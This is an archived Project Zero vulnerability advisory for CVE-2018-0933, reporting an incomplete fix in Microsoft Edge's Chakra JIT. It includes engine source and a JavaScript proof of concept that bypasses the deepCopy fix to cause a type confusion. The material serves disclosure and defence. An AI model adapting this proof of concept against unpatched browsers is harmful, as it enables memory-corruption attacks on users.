exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Edge Charka JIT Incomplete Fix For Issue 1420

Microsoft Edge Charka JIT Incomplete Fix For Issue 1420
Posted Apr 3, 2018
Authored by Google Security Research, lokihardt

A security fix applied for Microsoft Edge Chakra JIT is incomplete.

tags | exploit
advisories | CVE-2018-0933
SHA-256 | 3218d20b4b0f7b38f5401ba0b1f959df90c67629ecd1eb26504d9375a5243f97

Microsoft Edge Charka JIT Incomplete Fix For Issue 1420

Change Mirror Download
Microsoft Edge: Chakra: JIT: The fix for issue 1420 is incomplete. 

CVE-2018-0933


Here's a snippet of JavascriptArray::BoxStackInstance. To fix <a href="/p/project-zero/issues/detail?id=1420" title="Microsoft Edge: Chakra: JIT: stack-to-heap copy bug" class="closed_ref" rel="nofollow"> issue 1420 </a>, "deepCopy" was introduced. It only deep-copies the array when "instance->head" is on the stack. So simply by adding a single line of code that allocates "head" to the heap, we can bypass the fix.

template <typename T>
T * JavascriptArray::BoxStackInstance(T * instance, bool deepCopy)
{
Assert(ThreadContext::IsOnStack(instance));
// On the stack, the we reserved a pointer before the object as to store the boxed value
T ** boxedInstanceRef = ((T **)instance) - 1;
T * boxedInstance = *boxedInstanceRef;
if (boxedInstance)
{
return boxedInstance;
}

const size_t inlineSlotsSize = instance->GetTypeHandler()->GetInlineSlotsSize();
if (ThreadContext::IsOnStack(instance->head))
{
boxedInstance = RecyclerNewPlusZ(instance->GetRecycler(),
inlineSlotsSize + sizeof(Js::SparseArraySegmentBase) + instance->head->size * sizeof(typename T::TElement),
T, instance, true, deepCopy);
}
else if(inlineSlotsSize)
{
boxedInstance = RecyclerNewPlusZ(instance->GetRecycler(), inlineSlotsSize, T, instance, false, false);
}
else
{
boxedInstance = RecyclerNew(instance->GetRecycler(), T, instance, false, false);
}

*boxedInstanceRef = boxedInstance;
return boxedInstance;
}

PoC:
function inlinee() {
return inlinee.arguments[0];
}

function opt(convert_to_var_array) {
/*
To make the in-place type conversion happen, it requires to segment.
*/

let stack_arr = [];

// Allocate stack_ar->head to the heap
stack_arr[20] = 1.1;

stack_arr[10000] = 1.1;
stack_arr[20000] = 2.2;

let heap_arr = inlinee(stack_arr);
convert_to_var_array(heap_arr);

stack_arr[10000] = 2.3023e-320;

return heap_arr[10000];
}

function main() {
for (let i = 0; i < 10000; i++)
opt(new Function('')); // Prevents to be inlined

print(opt(heap_arr => {
heap_arr[10000] = {}; // ConvertToVarArray
}));
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close